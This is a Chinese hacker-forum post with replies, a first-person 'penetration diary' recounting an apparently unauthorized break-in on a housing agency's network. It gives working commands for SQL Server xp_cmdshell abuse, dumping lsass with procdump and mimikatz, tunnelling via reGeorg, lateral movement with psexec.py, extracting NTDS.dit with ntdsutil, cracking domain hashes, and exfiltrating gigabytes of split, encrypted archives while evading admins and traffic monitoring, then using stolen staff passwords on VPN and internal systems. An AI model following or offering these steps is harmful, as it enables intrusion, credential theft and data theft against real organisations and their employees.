查看: 59570|回复: 166

【小明渗透日记】小明要租房

[复制链接]
  • TA的每日心情

    2016-5-24 16:08
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-8 13:57:53 | 显示全部楼层 |阅读模式
    响应90大大的号召。。。。
    这文章原本是发在90sec的,现在挪到ihonker

    201x年12月10日    星期二    天气晴    宜搞站禁约炮

        我是小明,小鸡那日了狗的拉我到xx搬砖,工地不给住宿,于是小明要租房,东走走西找找,花花花两天过去了,累成了狗,无赖之下找到xx中介,3000大洋中介费,我滴那个娘啊!看见他宣传单下角的网址,默默交了钱拿着宣传单回了家。

    0x01 引言
        渗透、搞站、日网在相关书籍当中基本没有说关于渗透理论的知识,书籍中基本都是工具的使用+各种小方法和小技巧,很多公式性的东西都是大家常年搞站和朋友一起交流出的结果。在渗透中“渗透3通道”是总结出的一个特别好的结论。(ps:一定是我不喜欢看书)
        渗透3通道:命令执行通道(渗透路线)、文件传输通道(大量数据拖取)、权限控制通道(木马后门控制战果)
        本文只通过小明实际案例说下命令执行通道,其他的请期待以后的小明渗透日记。

    0x02 命令传输通道模型
    wpid-2b24114599731b0297ade9ac8d82c361_69170539-69ea-4d1e-93ae-11ec3bbb05f6.png
    这个是目前最好使用的命令传输通道(当时里面也有很多坑,在特定环境还需细微改动),在以前很多老文章中会出现的老工具如:hd、lcx、xsocks、ssock、reDuh等等都不是太好用。


    0x03 寻找网络边界短板
        二级域名测试、旁站测试、c段测试是常用的是手法,不知道大家还记不记得我在《【小明渗透日记】追寻女神》中说到过关于网站业务和功能分析,我们可以通过寻找业务关联网站和新业务网站(最新的和最老的往往是出现漏洞几率比较高的地方)。
        通过查询目标各种广告和宣传,找到了近期的几个活动,不负众望,sqlerver 2008 sa权限注入,此过程不详述,都懂的windows2008+asp.net+sqlserver2008 构架的网站。sa权限注入,开xp_cmdshell,system权限,全程无尿点,但也遇到了坑,加不了账户360拦截着,于是用xp_cmdshell echo了菜刀一句话,找到sa密码用菜刀链接数据库,使用xp_cmdshell执行命令,使用
    procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
    dump lsass.exe内存回来,然后本地使用:
    mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
    mimikatz # sekurlsa::logonPasswords full

    抓取明文,在搞其他目标的时候遇到相同的构架其实也遇到了其他很多坑,比如开不了xp_cmdshell、加不了账户、有安全产品拦截等等,这只能靠自己平时积累了,没有哪一种办法是万能的。

        现在我们找到了突破口,一个ipconfig /all 跳出来了域,是一个域环境中的机器,幸运的是明文抓到了域控账号(其实也是情理之中的,因为我们搞的是新活动,管理员还在调试,肯定经常登录这台机器,这也算搞新活动的一个优点吧)
        通过DNS初步确定了172.13.x.x是域控,下一步就该上域控拖东西了。关于什么域探测啊之类的文章多的很不累诉。


    0x03 搭建命令传输通道
        1.reGeorg:Http socks5工具

        下载地址:https://github.com/sensepost/reGeorg
        使用:目标是.net的于是传文件中的tunnel.aspx上网站目录,然后本地执行
    wpid-2b24114599731b0297ade9ac8d82c361_b34ce55e-1b8f-4cbd-8df9-6eaeebabb8be.png
    -p参数:指定socks5端口
        -l参数:执行本地地址默认为127.0.0.1,最好使用-l参数改成0.0.0.0,这样很好的使用proxifier在windows上连接
        2.proxychain和proxifier
        在kali下修改/etc/proxychains.conf 之中
    wpid-2b24114599731b0297ade9ac8d82c361_3501bc8d-bf8a-4df5-b457-c74756614b3f.png
    直接修改sock4 127.0.0.1 9090 为 sock5 127.0.0.1 8090
        使用:proxychains 工具 工具参数
        3.windows下使用proxifier
        下载:百度各种破解版
        配置:结合我们上边reGeorg工具开的socks5,由于我们使用的是0.0.0.0,我们可以在windows上连接。我kali虚拟机ip为192.168.56.131
        工具栏profile-->proxy servers-->add
    wpid-2b24114599731b0297ade9ac8d82c361_17e9a403-b692-4793-b6ab-f2289713df27.png
    工具栏profile-->proxification rules 修改default策略的action栏为direct。好了各种ok。
        使用:我如我们想哪一个工具使用代理就直接右键-->profixier-->你自己配置的proxy,我使用mstsc.exe连接域控
    wpid-2b24114599731b0297ade9ac8d82c361_09797396-5329-486c-af0d-ae35d45ab02f.png
    4.psexec.py
        这个工具让我们很好的有一个命令行去控制目标,为什么是py的呢?为什么不用psexec.exe,大牛告诉我psexec.exe是会在目标上建服务并且退出的时候不会删除的,所以还是psexec.py或者有个wmi版本的也可以。
        下载:https://github.com/nick-o/impacket(psexec.py是impacket包中的东西,里面还有其他有意思的东西)
        使用:下载好后先安装python setup.py install,
                   python pyexec.py administrator:password@127.0.0.1 cmd
    wpid-2b24114599731b0297ade9ac8d82c361_43f2bdf5-6f7b-44a4-96e9-9b7cde835893.png
    ssh和scp为目标机为linux的时候使用,由于此次目标为windows域,在此不多说。
        命令传输通道搭建玩了,我们可以尽情的使用本地linux和windows上的任何工具,再说下里面的坑:

        坑1:使用reGeorg时候,由于目标的脚本环境各种不同,reGeorg可能会报错,需要自己修改个别地方使用,成功率:jsp>.net>php

        坑2:管理员在线的时候最好别上,使用psexec.py,在进程中可以看见一个随机数组成的进程名,一看就是有问题,所以搞站还得月黑风高

        如看官还遇见过其他的坑,请指导


    0x04 拖域成员
        这篇文章中介绍了两种拖域成员的方法《windows server 2012 用户hash抓取方法研究(本地 域)》,本地搭建的环境和实际环境还是有很大差距的,里面有一些坑,需要自己填。
        我只说下我在本次渗透测试中成功的方法,不一定代表你在你目标中也能成功。

        ntdsutil.exe + QuarksPwDump.exe 是一个坑如果你导出的ntds.dit文件太大QuarksPwDump.exe 要报内存不足的错误(本地测试这个方法没有问题是因为你的ntds.dit文件太小(这个也是我猜测原因),实际情况中ntds.dit一般都有几个G),所以我使用的是ntsutil.exe +PWPR(Passcape Windows Password Recovery)。
        1.ntdsutil导出ntds.dit和system,使用《windows server 2012 用户hash抓取方法研究(本地 域)》中方法是没有问题的
        #ntdsutil

        #snapshot
        #activate instance ntds
        #create
        #mount {GUID}
        copy c:\{挂载点}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit (可手动复制)(新窗口复制)
        copy c:\{挂载点}\WINDOWS\system32\config\system c:\system
        #unmount {GUID}
        #delete {GUID}
        #quit
        #quit     2.PWPR(Passcape Windows Password Recovery)

        这个是一个收费软件(虽然有demo版本,但是不好用),破解版下载:http://www.ttrar.com/html/Passca ... overy-Advanced.html

        这个工具很强大,看官自己摸索,我只说下解域密码
    wpid-2b24114599731b0297ade9ac8d82c361_57a67b99-fd0f-4815-9b85-416d390b546f.png
    里面有gpu破解,很快跑出来了
    wpid-2b24114599731b0297ade9ac8d82c361_74615d3d-7dcd-4d91-a8c5-a248848853af.png
    说下当我导出ntds.dit和system是怎么拖回来的,nsds.dit有2G,首先用rar分块打包(每块大小看自己网络环境),用资源共享net use,把它们传到web服务器的web目录下(这个步骤是内网比较快),然后使用迅雷或者什么百度云盘等各种云盘,给下载回来(自己网速不好就先离线)。这个过程有2个坑:
        坑1:打包一定要加密,太大必须分块,apache最大文件下载支持2G(亲身受害过),所以别被掉坑了
        坑2:一定要观察下网络中有没有什么流量监控设备(尼玛有一次下着下着就被发现了,打包后8个多G的邮件啊)

    0x05 辛苦的后渗透阶段
        东西拖回来了,也解密了,我一直没说拖的域是什么域,其实是员工域,你懂的。得到了80%(有些没破解出来,nt hash 你懂不是lm hash)的员工账号密码。接下来就是累死人的阶段。

        邮件、vpn、各种内部系统, 怎么翻邮件已经在《【小明渗透日记】追寻女神》说过了。说下vpn,vpn在国内企业使用量最多的应该是深信服的sslvpn了,目标也是用的此种,登vpn有许多的坑。
        深信服sslvpn版本多,遇到好多种版本了,并且这样sslvpn用ie最好用,进去后的界面差距很大(功能设定上的),有点是直接给你几个按钮,你点击进入内部系统,有点是直接显示你能够访问的ip段或指定ip的指定端口,还有的进去是给你一个虚拟化桌面(你懂的,虚拟化桌面类似终端机,使用终端机绕过手法,进去使用此台机器做跳板)。然后就是登录vpn要多登录,可能你登录几个都没有权限(最开始我sb觉得是他vpn有问题,怎么进去不能用),多登录找到有权限的。
        各种内部系统,内部系统就多了,可以从vpn中发现很多内部系统,有3种系统是非常重要的:运维系统、文件共享系统、存储系统(有次遇到netapp,尼玛真是长见识了)。

        比如此次目标找到了运维系统,你懂的帐号密码拓扑图一大堆,基本就完整控制了全部网络,运维手册简直就是渗透路线指导书。

    0x06 总结
        搞完之后,最后发现,尼玛有意义么?没意义!什么也没干,来也匆匆去也匆匆,继续交房租继续板砖。

    评分

    参与人数 1人气 +1 i币 +10 收起 理由
    08sec-君子 + 1 + 10 我也是 大学狗刚毕业。。。租房子。。找媳.

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2015-6-8 19:20:06 | 显示全部楼层
    沙发 看了 没懂 求详解
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-4-28 17:07
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2015-6-9 14:32:45 | 显示全部楼层
    没能看懂,自己的技术太渣渣了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-11-13 15:30
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2015-6-9 15:16:27 | 显示全部楼层
    高手高手高高手!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 04:16:33 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 12:09:24 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 13:10:52 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-27 13:20:04 | 显示全部楼层
    加油!干倒冰儿和酒仙!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:34:32 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 09:13:41 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 10:45 , Processed in 0.037398 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部